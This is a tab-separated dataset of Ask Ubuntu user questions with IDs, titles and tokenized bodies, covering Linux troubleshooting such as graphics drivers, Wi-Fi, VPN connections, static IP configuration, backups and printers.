379425	installing amd ati catalyst	i 'm trying to install that driver my graphics card is : amd rs880m with mobility radeon hd 4225/4250 is on my hp notebook . i 'm trying to install this driver : amd-driver-installer-catalyst-13.1-legacy-linux-x86.x86_64.run i run that driver in terminal , but i got this message '' check if system has the tools required for installation . fglrx installation requires that the system have kernel headers . /lib/modules/3.11.0-12-generic/build/include/linux/version.h can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended . ''
379426	shortcut to change playlist in audacious	the audacious music player presents playlist as tabs . file explorers like caja or nautilus provide very easy and useful shortcuts to change between tabs : alt+number . audacious lacks this functionality and i 'm wondering if there is a way to change current playlist using only keyboard ?
379427	how can i launch grub-customizer ?	i 've installed ubuntu 13.10 . i 've installed grub-customizer and re-checked my installations of unity and grub-customizer . when i try and reinstall grub-customizer i get the message that `` grub-customizer is already the newest version '' but , when i click on unity and type '' grub '' all i can see is the file folder where grub is . in fact i ca n't find any apps with unity . i guess i have to repair unity ? i tried to reinstall it but got the same message about `` unity-scope-home already being the newest version . '' how do i repair whatever is broken so i can launch grub ? ? thanks
379429	how to lock a folder from terminal	is there any way to lock a folder from terminal ( protected with password ) without using any third party applications like truecrypt , crypteeper nor giving user permissions . it was just like whenever a user try to open that folder , it suddenly prompt for password.the given password must not be similar to sudo password .
379430	upgrading to alpha fails due extras repositories	i try to upgrade to the latest release of ubuntu ( 14.04 - alpha ) . i typed this in the terminal : $ sudo update-manager -d after some checks , a popup appeared : i clicked the upgrade ... button : preparing to upgrade was successful , but setting new sofware channels fails : how can this be fixed ?
379438	how do i connect to the wifi in ubuntu within my virtual machine ?	i have a virtual machine installed on my windows 8.1 laptop with ubuntu installed on it , but when i open the network menu it does n't show any wireless networks . how do i connect ubuntu in my virtual machine to a wireless network that my host machine is detecting ?
379440	wifi not working on ubuntu 12.04 dell 3521	i have installed ubuntu 12.04 alongside windows 8 on my dell inspiron 3521 15r . wifi is working perfectly fine on windows 8 but its not working on ubuntu 12.04 , rather its not even getting detected . i have tried installing backports by sudo apt-get linux-backports-modules-cw-3.6-precise-generic this did n't work . i have tried installing almost everything , but still not working . result of : lspci 00:00.0 host bridge : intel corporation ivy bridge dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation ivy bridge pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation panther point usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation panther point mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation panther point usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation panther point high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation panther point pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation panther point pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation panther point usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation panther point lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation panther point 6 port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation panther point smbus controller ( rev 04 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati device 6601 07:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 08:00.0 network controller : atheros communications inc. device 0036 ( rev 01 ) result of : lsusb bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0cf3:0036 atheros communications , inc . bus 001 device 004 : id 0bda:0129 realtek semiconductor corp . bus 001 device 005 : id 0c45:64ad microdia result of : rfkill list 0 : hci0 : bluetooth soft blocked : no hard blocked : no
379446	vpn from ubuntu to microsoft - protocol not available	http : //ubuntuforums.org/showthread.php ? t=1245224 i think i have the same situation ant problem . does anybody have a solution ? /var/log/syslog nov 19 18:49:30 sheirys-535u3c networkmanager [ 927 ] : starting vpn service 'pptp ' ... nov 19 18:49:30 sheirys-535u3c networkmanager [ 927 ] : vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 2573 nov 19 18:49:30 sheirys-535u3c networkmanager [ 927 ] : vpn service 'pptp ' appeared ; activating connections nov 19 18:49:30 sheirys-535u3c networkmanager [ 927 ] : vpn plugin state changed : init ( 1 ) nov 19 18:49:30 sheirys-535u3c networkmanager [ 927 ] : vpn plugin state changed : starting ( 3 ) nov 19 18:49:30 sheirys-535u3c networkmanager [ 927 ] : vpn connection 'scm software ' ( connect ) reply received . nov 19 18:49:30 sheirys-535u3c pppd [ 2577 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . nov 19 18:49:30 sheirys-535u3c pppd [ 2577 ] : pppd 2.4.5 started by root , uid 0 nov 19 18:49:30 sheirys-535u3c pppd [ 2577 ] : using interface ppp0 nov 19 18:49:30 sheirys-535u3c pppd [ 2577 ] : connect : ppp0 /dev/pts/1 nov 19 18:49:30 sheirys-535u3c networkmanager [ 927 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) nov 19 18:49:30 sheirys-535u3c networkmanager [ 927 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . nov 19 18:49:30 sheirys-535u3c pptp [ 2580 ] : nm-pptp-service-2573 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated nov 19 18:49:30 sheirys-535u3c pptp [ 2588 ] : nm-pptp-service-2573 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' nov 19 18:49:30 sheirys-535u3c pptp [ 2588 ] : nm-pptp-service-2573 log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply nov 19 18:49:30 sheirys-535u3c pptp [ 2588 ] : nm-pptp-service-2573 log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . nov 19 18:49:31 sheirys-535u3c pptp [ 2588 ] : nm-pptp-service-2573 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' nov 19 18:49:31 sheirys-535u3c pptp [ 2588 ] : nm-pptp-service-2573 log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . nov 19 18:49:31 sheirys-535u3c pptp [ 2588 ] : nm-pptp-service-2573 log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 28645 ) . nov 19 18:49:31 sheirys-535u3c pptp [ 2580 ] : nm-pptp-service-2573 warn [ decaps_gre : pptp_gre.c:331 ] : short read ( -1 ) : protocol not available nov 19 18:49:31 sheirys-535u3c pptp [ 2588 ] : nm-pptp-service-2573 log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) nov 19 18:49:31 sheirys-535u3c pptp [ 2588 ] : nm-pptp-service-2573 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' nov 19 18:49:31 sheirys-535u3c pptp [ 2588 ] : nm-pptp-service-2573 log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) nov 19 18:49:31 sheirys-535u3c pppd [ 2577 ] : modem hangup nov 19 18:49:31 sheirys-535u3c pppd [ 2577 ] : connection terminated . nov 19 18:49:31 sheirys-535u3c avahi-daemon [ 921 ] : withdrawing workstation service for ppp0 . nov 19 18:49:31 sheirys-535u3c networkmanager [ 927 ] : vpn plugin failed : 1 nov 19 18:49:31 sheirys-535u3c networkmanager [ 927 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) nov 19 18:49:31 sheirys-535u3c pppd [ 2577 ] : exit . nov 19 18:49:31 sheirys-535u3c networkmanager [ 927 ] : vpn plugin failed : 1 nov 19 18:49:31 sheirys-535u3c networkmanager [ 927 ] : vpn plugin failed : 1 nov 19 18:49:31 sheirys-535u3c networkmanager [ 927 ] : vpn plugin state changed : stopped ( 6 ) nov 19 18:49:31 sheirys-535u3c networkmanager [ 927 ] : vpn plugin state change reason : 0 nov 19 18:49:31 sheirys-535u3c networkmanager [ 927 ] : error disconnecting vpn : could not process the request because no vpn connection was active . cat /etc/modules # /etc/modules : kernel modules to load at boot time . # # this file contains the names of kernel modules that should be loaded # at boot time , one per line . lines beginning with `` # '' are ignored . lp rtc ip_gre also do not work without ip_gre module . dpkg -l pptp-* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version description +++-=================================-=================================-================================================================================== ii pptp-linux 1.7.2-6 point-to-point tunneling protocol ( pptp ) client
379447	how do i change graphics drivers in 13.10 ?	where has the option to install proprietory drivers gone in 13.10 ? it used to be an option in system settings , but i ca n't see it there any more .
379451	luckybackup rsync errors with exfat	i am having an issue with luckybackup on ubuntu failing after i formatted an external ssd to exfat using windows 7 i have installed the necessary drivers to access the exfat file system , e.g . sudo apt-get install exfat-fuse 1st off i did a straight copy to get the files onto the formatted drive , from my home directory to the ssd external drive - worked no problem when i plug in the drive ubuntu automounts it to media/ben/ssd but then when i subsequently try to run luckybackup i get the following error : ===================================== execution of task : home , starting source : /home/ben/ destination : /media/ben/ssd/ben/ rsync : getcwd ( ) : no such file or directory ( 2 ) rsync error : errors selecting input/output files , dirs ( code 3 ) at util.c ( 1002 ) [ receiver=3.0.9 ] execution of task : home , finished ===================================== and this halts the backup the destination dir exists , e.g . ben @ laptop-5 : /media/ben/ssd $ ll total 260 drwxr-xr-x 1 root root 131072 jan 1 1970 ./ drwxr-x -- -+ 3 root root 4096 nov 19 16:29 ../ drwxr-xr-x 1 root root 131072 nov 19 14:24 ben/ i also note that /media/external is also appearing when the drive automounts , not sure what that is though i 'm confused as to where the problem lies , whether it is something to do with luckybackup not working with exfat and the fuse stuff or something else ? i need to be able to backup though and luckybackup has been faultless up until now.. mount info is as follows : /dev/sda6 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc ( rw , noexec , nosuid , nodev ) gvfsd-fuse on /run/user/ben/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=ben ) /dev/sdd1 on /media/ben/ssd type fuseblk ( rw , nosuid , nodev , allow_other , blksize=4096 )
379453	remote control ubuntu from android	this is not really an urgent question but i just want to know if anything like this exists . i currently have an app for my android phone called phonymypc and it allows me to control windows ( 7 ) from my phone . i get a view of the entire screen and i can use the mouse as input , keyboard , etc etc . is there something like this on ubuntu ? i 've looked around and i have n't seen something similar . thanks
379463	imap is gone in evolution for ubuntu 13.10	in ubuntu 13.04 when you configured an email account there were two imap options , imap and the new imap+ . i had some accounts configured in the old imap protocol , which was useful for servers that do not support imap+ . in the upgrade to 13.10 even though evolution is almost the same version ( i think it went from 3.8.3 to 3.8.4 ) the old imap protocol is gone . this is a problem for me because with imap+ i can only access the inbox and not the rest of the folders . is there a way to re-enable the old imap protocol as an option in evolution ? thanks
379467	open vpn connected / disconnected script runtime	we use to route subnets dynamically by executing a connectd script and delete routes when the clients disconnects . seems we encounter fork failed and auth failed errors due to execution time . is it possible to allow a greater time for the scripts to finish ? tue nov 19 02:00:07 2013 us=658152 host1/w.x.y.z:34971 client-connect command failed : shell command fork failed tue nov 19 02:00:10 2013 us=34026 host1/w.x.y.z:34971 sent control [ host1 ] : \'auth_failed\ ' ( status=1 ) connect-script : # ! /bin/sh if [ $ common_name = 'host1 ' ] then /sbin/ip route add 10.1.3.0/24 via 10.1.254.3 dev br0 echo 'subject : # # # router # # # ; host1 ; 10.1.3.0/24 ; 10.1.254.3 ; route added ' | sendmail -f mailbox @ foo.org -t router @ foo.org fi disconnect-script : # ! /bin/sh if [ $ common_name = 'host1 ' ] then /sbin/ip route delete 10.1.3.0/24 via 10.1.254.3 dev br0 echo 'subject : # # # router # # # ; host1 ; 10.1.3.0/24 ; 10.1.254.3 ; route deleted ' | sendmail -f mailbox @ foo.org -t router @ foo.org fi
379469	ubuntu 13.10 startup issues	okay , so when i boot ubuntu 13.10 normally it boots but there is no mouse , and my wifi is turned off , the only thing that works is my keyboard which i was able to log in with and run dpkg thinking it was a package issue , rebooted and issue was still there . i have no mouse and the graphics are in a streched 1024x600 setting ( i thought that was really odd seeing as my monitor wo n't even support 1024x600 natively ) anyway , i finally gave up on trying to fix that part and i 'm booted now using kernel 3.11.0-12 my normal kernel is 3.11.0-13 though , i really hate having to use advanced settings to log in every boot , does anyone have a idea what might be causing the issues ? i 'm not sure what to run for a log or i 'd post it here . it wo n't let me comment , but no , however my power did go out right before this started and the laptop shut down instantly , if that has anything to do with it . the only thing i did before that happened was i installed v4l2loopback but that should n't have caused this , and i 've already removed it . is there a way to just reinstall the new kernel again from being booted in the old ?
379470	setting static ip address	i am trying to set up a static ip address for my ubuntu machine in my local network . my plan is to eventually use something like dnsdynamic so that i can log in to the machine remotely without setting up a static ip with my isp . i have followed the blogs explaining how to do this , but have not found a solution to this problem . i have spent the last 2 days searching for a solutions . what i have done : edit /etc/network/interfaces auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.0.0.100 netmask 255.255.255.0 gateway 10.0.0.1 dns-nameservers 10.0.0.1 i have tried editing /etc/resolv.conf , but it is overwritten anyway . it does n't really matter though because the dns server is the same as above , which is what i want ( the west coast comcast dns -- i think comcast makes it difficult to change that and i am fine with their dns ) i added a /etc/dhcp3/dhclient.conf prepend domain-name-servers 68.87.85.98 ; i do n't think this is necessary , but it appeared to be one of the ways to get around resolv.conf overwriting itself . i have used /etc/init.d/networking restart after every step . here is my ifconfig if useful : eth0 link encap : ethernet hwaddr 00:0c:29:5e:52:95 inet addr:10.0.0.100 bcast:10.0.0.255 mask:255.255.255.0 inet6 addr : fe80 : :20c:29ff : fe5e:5295/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:35748 errors:0 dropped:0 overruns:0 frame:0 tx packets:86900 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:26443809 ( 26.4 mb ) tx bytes:8441458 ( 8.4 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:355943 errors:0 dropped:0 overruns:0 frame:0 tx packets:355943 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:132886096 ( 132.8 mb ) tx bytes:132886096 ( 132.8 mb ) ` anyway now my i have no internet connection and ca n't even connect to the router gateway . i have a tc8305c router provided my comcast if that makes a difference . how can i fix this issue ?
379471	let kde make alsamixer handle sound volume	is there a way when using the kde desktop environment , to not have the kde control the audio volume , but to have alsa handle it . the reason i 'm wanting to do this is because kde does n't detect my headset , and thus when changing volume the changes do n't actually take effect . ( the speakers get adjusted ) is there a way to let alsa handle the sound ?
379474	np700z5c-s03it and ubuntu	i have the laptop in the title and i would like to install ubuntu 13.10 in dual boot with a preinstalled win8 ... i am aware of the uefi boot problem ( brick bug ) there were months ago so i would like to know if it 's still there or if i can procede and installing it the normal way . in particular should i follow this guide ? https : //help.ubuntu.com/community/uefi if so should i try to install it with `` trial and error '' and then `` repair '' if needed ? if not how ? i would like to have 3 partitions ( win8 , linux , shared btw the two ) what about the recovery entry from samsung in the boot ? will i loose it ? thanks
379479	ca n't download apps through unity	i am unable to buy apps using ubuntu . i tried to download full circle magazine through unity in ubuntu 12.04 and received an error `` problem occurred while loading the url https : //apps.ubuntu.com/cat/tos/plain/ can not resolve proxy hostname ( ) '' this happened on other occasions too and it seems that it is related to buying apps . installing applications and software through unity has not been a problem . i do n't have a proxy .
379480	kde desktop freezes during hangout call	kde works fine in daily usage , but after making call using google hangout for 1 hour or so , it starts freezing for some seconds . the only thing i can do is using the mouse , everything freezes ( sound , hangout , chromium , panel etc. ) . i tried to change scheduling settings , but it did not help . what else can i do ?
379482	does ubuntu work on the intel d975xbx2 motherboard ?	i know intel does not support linux on the board , but it is a good machine , and i do not want to trash it . ( no windows 7 or 8 support ) . i could not find any hardware advice on the ubuntu site .
379483	nvidia x server settings lost on every reboot	i am running a geforce gtx 770 on a z87 gigabyte mobo and dual-boot windows 8.1 pro and ubuntu 12.04.3 lts . the setup runs smoothly overall except for when it comes to video and 3d performance in ubuntu . i had the infamous flickering issue at one point and found a way to fix it . it has to do with the nvidia card going into low-power mode and then videos and 3d effects suffer from tearing and stuttering . the fix is to go to nvidia-settings and change the power-mode from 'auto ' to 'prefer maximum performance ' . the problem is this only works until i reboot . after the reboot the setting is cleared and the problems still persist , so i have to manually set it again for the current session . i tried gksu-ing and setting it , but it did n't work . i tried to edit the etc/x11/xorg.conf , but it 's empty - there are zero lines in that file ... i read all the related articles , but mainly people complain about brightness being reset or dual-monitor configs , which solutions involve some specific app that does n't help me in any way . tl ; dr : nvidia settings are reset after reboot and tried everything i could find on the internet to no good . if someone knows what to do in this situation , please share ! thank you ! edit [ 1 ] : i did some further digging and it seems there is no obvious or safe solution . some people have tried to set the performance level manually , but report it 's unsafe and may kill the gpu . there is still hope though . i think this could be done through the nvidia profiles option provided from nvidia-settings . the problem is that one needs to know the key in question and the value this key accepts . i could have put a screenshot here , but i need rep = > 10 ... i could n't find a list of the possible keys nor any key values ... no luck i guess . can someone provide a link or list some useful ones ? thanks ! edit [ 2 ] : finally ! thanks to everybody for the help ! i found the solution with the help of vegard torvund and this thread . and thanks to the ubuntu google+ community for spreading the word !
379484	make non-ubuntu drives disappear	i am an absolute newbie with ubuntu . would be happy if somebody could help me here . i have a windows 8 pc with several internal hard drives . i managed to install ubuntu 13.10 on one of those drives , by clicking on `` something else '' during the installation process . i start ubuntu in the bios during boot by pushing f8 ( asus mainboard ) , which allows me to select the drive from which to boot . ( default is windows 8 , which is fine with me ) . so here is my question . when in ubuntu , i can see my other drives . is there a way to make the drives `` disappear '' ? i mean so that ubuntu does not even know that they exist ? of course i still need the drives fully funtional on the windows side . would be great if this would be possible . thanks for your help in advance ! mark
379485	problem changing users in ubuntu 13.10	i got problem with changing users . i got two user accounts , one root and one normal user . when normal user login and after a while lock screen appears or you try to change user and you press change user , you got a black screen , no back-light or nothing but i can hear ubuntu tune playing . after using terminal command startx i end up looking root user background or got an error message that tells unable to connect to x server : connection refused . only reboot helps or it 's only thing i know how to do it . : ) so is this something i can fix by reinstalling something or is this something i should report as a bug ? ubuntu 13.10 , gallium 0.4 on amd aruba ( using one graphic card.. ) , dual graphics amd radeon hd7640g + 7600m . computer samsung series3 np355v5c-s08se
379486	d-link dwa 525 wifi adapter installation error	until a week ago , i was on ubuntu ( laptop ) . i just sold my laptop and picked up a desktop . i never realised the internet issue until i installed ubuntu 13.10 . the system fails to connect to the internet . it surely recognises the presence of the adapter because it clearly asks for the password . i have only wifi at home and no wired connection . i researched a lot of questions here as well as in ubuntu forums , but sadly no answer helped , mainly because they are all old . realised it 's a driver issue . i need to get back to ubuntu to practice python programming . windows giving too many problems . plus , i am a linux newbie , so ca n't hack my way into this . can anyone help me configure the wifi adapter and get me online ? thanks
379487	error boot ubuntu 12.10 in virtualbox	i have installed ubuntu 12.10 and ubuntu 13.10 on virtualbox version 4.3.2 for windows 7 , the installation seems to be ok , but it gives this error message after typing the password : executablepath/usr/bin/compiz
379492	boot sometimes fails	i hope i am at the right place for my question . i have installed xbmcbuntu ( xbmcbuntu-12.2.intel-nvidia.iso ) on my htpc . only i walk in to some problems . my system sometimes fails to boot correctly . the splash logo freshens and i need to hold the power button to turn of the system . when i start my htpc again i get a gnu grub menu to boot ubuntu . when i get this grub menu and choose ubuntu most of the times it boots correctly , sometimes it does n't . i tried to log my boot . but i think it does n't log my start up failures , because the boot log look the same every time i open it , even when i had a failed start up . this is my boot.log ( i guess ) scanning for btrfs filesystems fsck from util-linux 2.20.1 /dev/sda1 : clean , 187615/9641984 files , 1439162/38548224 blocks rpcbind : can not open '/run/rpcbind/rpcbind.xdr ' file for reading , errno 2 ( no such file or directory ) rpcbind : can not open '/run/rpcbind/portmap.xdr ' file for reading , errno 2 ( no such file or directory ) loading the saved-state of the serial devices ... lircd-0.9.0 [ 897 ] : lircd ( default ) ready , using /var/run/lirc/lircd setting sensors limits [ 80g [ 74g [ ok ] * loading lirc modules [ 80g [ 74g [ ok ] [ 31m* [ 39 ; 49m unable to load lirc kernel modules . verify your [ 31m* [ 39 ; 49m selected kernel modules in /etc/lirc/hardware.conf rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service s20smbd start initctl : unknown job : s20smbd since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start s20smbd * starting xbmcbuntu [ 74g [ ok ] * stopping [ 74g [ ok ] * stopping xbmcbuntu [ 74g [ ok ] * starting ubuntu live cd installer [ 74g [ ok ] * stopping xbmcbuntu job starter [ 74g [ ok ] * stopping xbmcbuntu job starter [ 74g [ ok ] * stopping ubuntu live cd installer [ 74g [ ok ] * starting lightdm display manager [ 74g [ ok ] * starting mdns/dns-sd daemon [ 74g [ ok ] * starting cups printing spooler/server [ 74g [ ok ] * starting samba auto-reload integration [ 74g [ ok ] * stopping samba auto-reload integration [ 74g [ ok ] * starting smb/cifs file server [ 74g [ ok ] i cant find any errors , maybe someone could help me with this problem .
379495	how do i submit a browser plugin to software center	we have an app divided in two parts , a browser plugin and the actual app . the plugin is used to start our desktop app . these are not open-source . we want to submit our app to the software center but int the guidelines says that all should be installable in /opt/ if i can not put my plugin in /usr/lib/mozilla/plugins/ what can i do ?
379497	how do i set 'nomodeset ' after i 've already installed ubuntu 12.04 ltd on asus f5gl	i installed ubuntu 12.04 ltd and while installation i faced the blank screen which is a graphic card setting problem . how can i use nomodeset to be able to install this version of ubuntu on my laptop ? ! i am not an expert please give me the complete direction .
379501	precise misbehave after dist-upgrade	i upgraded my xubuntu precise , yesterday , and it behaves strange . here are some error i 've noticed : at first , after successfully upgraded , it wo n't hibernate like usual . i thought it because i just upgraded . so i restarted it . but it behave unusually . before ( normally ) , i still could make it hibernate , even i should turn off the power as final touch manually . now , everytime i hibernate , the wake-up process is buggy that makes it forced to something-like-restart it takes so long to take into login screen from restart/ shutdown it takes so long to when log in into desktop from login screen the desktop is revert into a default xubuntu 's wallpaper , and wo n't changed even i tried many times , both from desktop setting nor from settings > setting editor > display . and from settings > setting editor > display i realized if my prev deskop 's configuration is still exists . what i did is just sudo apt-get update and sudo apt-get dist-upgrade so , how could i solved these problems ?
379502	mongo db left a big folder after remove	i 've removed mongodb sudo apt-get remove mongodb but then found its parts : root @ vickers : /var/lib/mongodb/journal # ls -lh total 768m -rw -- -- -- - 1 mongodb nogroup 256m nov 18 17:35 prealloc.0 -rw -- -- -- - 1 mongodb nogroup 256m nov 7 19:11 prealloc.1 -rw -- -- -- - 1 mongodb nogroup 256m nov 7 19:11 prealloc.2 it 's so strange that it took so much space since i did n't used it much ( just some tests in console ) . how should i remove mongo to force it remove all its parts ? upd . also tried sudo apt-get purge mongodb . the same
379504	problem with nvidia driver 331.20 on ubuntu 13.10 ( 64bit )	this is what i did : pressed ctrl+alt+f1 stopped lightdm and all that stuff removed nouveau driver and installed nvidia 331.20 driver since then after loging in my computer i get a black screen and i can only get to the place where you log in and press ctrl+alt+f1
379505	how do i determine if my laptop battery driver is bad , or if i have a bad battery ?	battery will not charge at all . read somwhere that it could be the battery driver , but i do n't know how to assess that . any help appreciated .
379507	bluetooth is not pairing devices in saucy 13.10	after a fresh install of ubuntu 13.10 saucy , i ca n't pair devices using bluetooth . is any way to resolve this problem , or reset in some way the bluetooth ? please feel free to ask me which log files i have to paste , and i will edit the question .
379508	how can i get multiple syba si-pex40057 ( marvell 88se9230-based ) sata cards to play nice ?	i 've built a storage server using : supermicro x9scm-f motherboard three syba si-pex40057 pcie sata cards ubuntu server 12.04 lts all twelve ports on the cards are populated with storage drives , as are three of the ones on the motherboard , plus the boot drive , which is also on the motherboard . if i put load on the storage drives by copying a large file to them , the ones on the motherboard work fine , but the ones on the cards slowly start getting errors and eventually the system gives up and disables the controllers entirely , necessitating a reboot to get them back . clearly not good . for the record , if i have only one of the three cards in the system , things seem to work fine . it 's only when i have multiples in that everything becomes brittle . the syba people are pretty useless , giving me a lot of handwaving about how marvell only supports windows and how ubuntu must be `` having an issue with prioritizing which controller card is being used '' . and how i might investigate how to assign each card its own irq and i/o ports . but the logs below show that this is already being done . and , of course , how the solution is to trash two of my brand-new cards and pay for another , different controller of theirs to replace them . ಠ_ಠ what can iâ do to make these things behave and play nice together ? for the logs below , i did tee /srv/storage/c1d2/randombytes /srv/storage/c1d3/randombytes /srv/storage/c1d4/randombytes /srv/storage/c1d5/randombytes > /dev/null < randombytes where randombytes is a 60gib file of random bytes . logs ahoyâś output of lspci -vv output of uname -a : linux cave-storage 3.8.0-33-generic # 48~precise1-ubuntu smp thu oct 24 16:28:06 utc 2013 x86_64 x86_64 x86_64 gnu/linux output of dmesg contents of syslog starting at boot ( part 1 , part 2 ) output of lshw just for good measure , output of lsusb -v
379509	how to get festival to show up in orca	i 'm a bit new to linux/ubuntu , but i believe i have a good feel for the system . i 'm currently trying to change the voice synthesizer for the orca screen reading software on vinux , as the default voice is horrible . i 've read a few threads on this site and have , in turn , entered the following commands : sudo apt-get install festival festvox-kallpc16k sudo apt-get install libgnome-speech7 sudo apt-get install festvox-italp16k sudo apt-get install festvox-itapc16k little overlap here , but summary of packages : festival festival-freebsoft-utils speech-dispatcher-festival festlex-oald festlex-cmu festvox-kallpc16k festvox-kdlpc16k festlex-poslex festvox-don festvox-ellpc11k despite running each one and restarting orca and the computer a few times , i 'm unable to select the festival or gnome synthesizer in the orca speech preferences . after running all of them ( each appeared to be successful ) , i realized that some of these are probably just junk for alternative language packs , like italian . i just need english , but i 'm currently working on developing a computer recycle/resale program for the non-profit i work at , so i 'm definitely open to any suggestions or thoughts as far as customization . probably looking like a real noob in a few spots , especially where i repeat the commands , but i 'm stuck . thanks !
379516	how can i install my lexmark x4530 into my ubuntu 12.04 ?	i 'm having problems installing my lexmark x4530 into my computer running on ubuntu 12.04 i called lexmark tech support and also check on their website but there 's no driver on available for the printer . is there any possibility that i can install my printer into my computer even lexmark said that there 's no driver for this ?
379519	dual boot with windows on an encrypted drive , any problems ?	i have windows 7 at the moment and the whole system hdd is encrypted by truecrypt . i would like to make new partition on that drive install ubuntu there and encrypt it as well . at the moment the truecrypt encryption kicks in before even loading windows and asks for a password before it can load . if i remember correct it encrypt the boot sector as well ? so i have 2 questions , would this be a problem for installing ubuntu ? will i have to temporally remove the whole system drive encryption ? i read that there is option to install ubuntu on the same partition with windows ? is that correct and what are the disadvantages of that ?
379523	ca n't play dvd on ubuntu 13.10 ( with fluendo )	i ca n't play dvds - i had the message that : drive region settings do not allow access to this disk then i was told by the support center of fluendo this : most probably you dvd drive is set to work in a region different than the region of your discs . in the preferences menu you can change the region of your drive so it matches your discs . be warned that drives can only change their region a limited amount of times . now the dvd starts , i hear the sound , but there is no graphics at all and i ca n't stop the program not even with `` esc ''
379524	move gz archives with specific content	after a restoration of my hdd with photorec i have a folder with 36,500 gz archives . of those , around 200 are very important for me . each of these archives contains exactly one tar archive . these tar archives contain folders and among others files of the following file types : doc docx xls rtf pdf ppt ods odt jpg is it possible to create a shell script that opens each of these gz archives checks if there is a tar archive in it and - if yes opens the tar archive checks if the tar archive contains one of the given filetypes and - if yes moves the gz archive containing the tar to a given directory as i am a complete beginner when it comes to shell scripts , i would be very grateful for any hint or pointer in the right direction on how such a script could look like .
379525	ltsp not working since upgrade	i upgraded from 10.04 to 12.04 . after the upgrade i can not pxeboot ltsp not functioning . what are the steps to correct ?
379526	ubuntu does n't recognize my printer anymore	i 'm running ubuntu 12.04 and i have a hp officejet pro 8000 ( network ) printer . i 've never experienced any problems with it until yesterday . the day before yesterday i was printing something at it worked . yesterday i wanted to print something but could n't find the printer in ubuntu . i went to `` printing '' and it said `` printing service not available . start this service on this computer or connect to another server '' the button `` start service '' is not click-able , though . when i click on `` connect '' it says `` cups server : '' and the only option is `` localhost '' if i hit connect an error occurs saying `` cups server error : there was an error during the cups operation : 'failed to connect to another server ' '' how can i fix this ?
379527	keyboard layout automatically change but only one layout exits	i have problems with keyboard layout after updating to 13.10 ... keyboard layout automatically change ( most of my problems comes with `` z '' and `` y '' switch , as well as some specific letters č , ć , ž , š , đ ) ... i installed croatian keyboard and deleted english one . however , sometimes my keyboard layout is changed and i need to click on keyboard layout indicator to select the only layout that exist ... why is this happening ?
